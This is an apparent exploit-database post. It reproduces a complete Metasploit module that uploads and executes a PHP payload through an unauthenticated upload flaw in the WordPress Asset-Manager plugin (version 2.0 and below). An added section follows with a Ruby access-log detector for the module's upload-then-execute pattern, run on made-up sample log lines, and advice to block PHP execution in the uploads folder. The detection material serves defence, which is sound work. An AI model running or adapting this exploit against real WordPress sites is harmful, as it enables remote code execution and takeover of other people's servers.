WordPress Asset-Manager PHP File Upload Vulnerability

Posted on 2012-12-31 09:22:33
This Metasploit module exploits a vulnerability found in the WordPress Asset-Manager plugin, version 2.0 and below. It allows PHP file upload: a user can upload a file to a temp directory without any authentication, which results in arbitrary code execution.
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
#   http://metasploit.com/framework/
##

require 'msf/core'
require 'msf/core/exploit/php_exe'

class Metasploit3 < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::PhpEXE

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'WordPress Asset-Manager PHP File Upload Vulnerability',
      'Description'    => %q{
        This module exploits a vulnerability found in Asset-Manager <= 2.0 WordPress
        plugin.  By abusing the upload.php file, a malicious user can upload a file to a
        temp directory without authentication, which results in arbitrary code execution.
      },
      'Author'         =>
        [
          'Sammy FORGIT', # initial discovery
          'James Fitts <fitts.james[at]gmail.com>' # metasploit module
        ],
      'License'        => MSF_LICENSE,
      'References'     =>
        [
          [ 'OSVDB', '82653' ],
          [ 'BID', '53809' ],
          [ 'EDB', '18993' ],
          [ 'URL', 'http://www.myhack58.com/' ]
        ],
      'Payload'        =>
        {
          'BadChars' => "\x00",
        },
      'Platform'       => 'php',
      'Arch'           => ARCH_PHP,
      'Targets'        =>
        [
          [ 'Generic (PHP Payload)', { 'Arch' => ARCH_PHP, 'Platform' => 'php' } ],
          [ 'Linux x86', { 'Arch' => ARCH_X86, 'Platform' => 'linux' } ]
        ],
      'DefaultTarget'  => 0,
      'DisclosureDate' => 'May 26 2012'))

    register_options(
      [
        OptString.new('TARGETURI', [true, 'The full URI path to WordPress', '/wordpress'])
      ], self.class)
  end

  def exploit
    uri = target_uri.path
    uri << '/' if uri[-1,1] != '/'
    peer = "#{rhost}:#{rport}"
    payload_name = "#{rand_text_alpha(5)}.php"
    php_payload = get_write_exec_payload(:unlink_self => true)

    # Build the multipart/form-data body; the plugin reads the file from the "Filedata" field.
    data = Rex::MIME::Message.new
    data.add_part(php_payload, "application/octet-stream", nil, "form-data; name=\"Filedata\"; filename=\"#{payload_name}\"")
    post_data = data.to_s.gsub(/^\r\n\-\-\_Part\_/, '--_Part_')

    print_status("#{peer} - Uploading payload #{payload_name}")
    res = send_request_cgi({
      'method'  => 'POST',
      'uri'     => "#{uri}wp-content/plugins/asset-manager/upload.php",
      'ctype'   => "multipart/form-data; boundary=#{data.bound}",
      'data'    => post_data
    })

    if not res or res.code != 200 or res.body !~ /#{payload_name}/
      fail_with(Exploit::Failure::UnexpectedReply, "#{peer} - Upload failed")
    end

    # The uploaded file lands in the plugin's temp directory and is fetched to trigger it.
    print_status("#{peer} - Executing payload #{payload_name}")
    res = send_request_raw({
      'uri'     => "#{uri}wp-content/uploads/assets/temp/#{payload_name}",
      'method'  => 'GET'
    })

    if res and res.code != 200
      fail_with(Exploit::Failure::UnexpectedReply, "#{peer} - Execution failed")
    end
  end
end

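The module above leaves a very recognisable trace in the web server's access log: an unauthenticated POST to `wp-content/plugins/asset-manager/upload.php` followed, from the same client, by a GET of a `.php` file under `wp-content/uploads/assets/temp/`. The Ruby script below is an added detection example written for this post; it is not part of the original post or of the Metasploit module. It assumes the Apache/nginx "combined" log format, takes the two URL paths from the module's own request code, and runs over a handful of constructed log lines (the IPs, timestamps and file names are made up for illustration).

```ruby
# Added example, not part of the original post or the Metasploit module:
# scan access-log lines for the two-step pattern the module produces, an
# unauthenticated POST to asset-manager/upload.php followed by a GET of a
# .php file under wp-content/uploads/assets/temp/ from the same client.

# Both paths are taken from the module's request code above.
UPLOAD_PATH = %r{/wp-content/plugins/asset-manager/upload\.php}
TEMP_PHP    = %r{/wp-content/uploads/assets/temp/([A-Za-z0-9_.-]+\.php)}

# Assumed "combined" log format:
#   ip - - [time] "METHOD path HTTP/x" status bytes "referer" "user-agent"
LOG_RE = /\A(?<ip>\S+) \S+ \S+ \[(?<time>[^\]]+)\] "(?<method>[A-Z]+) (?<path>\S+) [^"]*" (?<status>\d{3}) /

# Parse one log line into a hash, or return nil for lines in another format.
def parse_line(line)
  m = LOG_RE.match(line)
  return nil unless m
  { ip: m[:ip], time: m[:time], method: m[:method], path: m[:path], status: m[:status].to_i }
end

# Returns an array of findings. Every POST to upload.php is reported as an
# "upload" (the endpoint should never be reachable without a WordPress session).
# A GET of a .php file from the plugin's temp directory is reported as
# "webshell_exec"; it is rated high when the same client uploaded earlier in the
# log, medium otherwise (the upload may simply lie outside the scanned window).
def detect_asset_manager_abuse(lines)
  findings = []
  uploads_by_ip = Hash.new { |h, k| h[k] = [] }
  lines.each do |line|
    rec = parse_line(line) or next
    if rec[:method] == "POST" && rec[:path] =~ UPLOAD_PATH
      uploads_by_ip[rec[:ip]] << rec
      findings << { type: "upload", ip: rec[:ip], time: rec[:time], path: rec[:path] }
    elsif rec[:method] == "GET" && (m = TEMP_PHP.match(rec[:path]))
      severity = uploads_by_ip.key?(rec[:ip]) ? "high" : "medium"
      findings << { type: "webshell_exec", ip: rec[:ip], time: rec[:time],
                    file: m[1], status: rec[:status], severity: severity }
    end
  end
  findings
end

# Constructed sample log: one full upload-then-execute sequence from 203.0.113.7,
# a harmless image fetch, and a probe for a temp .php file that does not exist.
SAMPLE_LOG = <<~LOG
  203.0.113.7 - - [31/Dec/2012:09:20:01 +0800] "GET /wordpress/ HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
  203.0.113.7 - - [31/Dec/2012:09:20:03 +0800] "POST /wordpress/wp-content/plugins/asset-manager/upload.php HTTP/1.1" 200 87 "-" "Mozilla/5.0"
  203.0.113.7 - - [31/Dec/2012:09:20:04 +0800] "GET /wordpress/wp-content/uploads/assets/temp/kqzxd.php HTTP/1.1" 200 0 "-" "Mozilla/5.0"
  198.51.100.9 - - [31/Dec/2012:09:21:10 +0800] "GET /wordpress/wp-content/uploads/2012/12/logo.png HTTP/1.1" 200 2048 "-" "Mozilla/5.0"
  198.51.100.9 - - [31/Dec/2012:09:21:12 +0800] "GET /wordpress/wp-content/uploads/assets/temp/abcde.php HTTP/1.1" 404 210 "-" "curl/7.26"
LOG

if __FILE__ == $PROGRAM_NAME
  detect_asset_manager_abuse(SAMPLE_LOG.lines).each { |f| puts f.inspect }
end
```

Run it directly to print the three findings for the sample log; in practice feed it `File.foreach("/var/log/apache2/access.log")` instead. A single POST to `upload.php` is already worth an alert on its own, since the plugin accepts the file without a session; the follow-up GET with a 200 status is the signal that the uploaded PHP actually ran. The same two paths make a straightforward WAF or web-server rule: deny PHP execution under `wp-content/uploads/` entirely, which neutralises this class of upload bug regardless of the plugin.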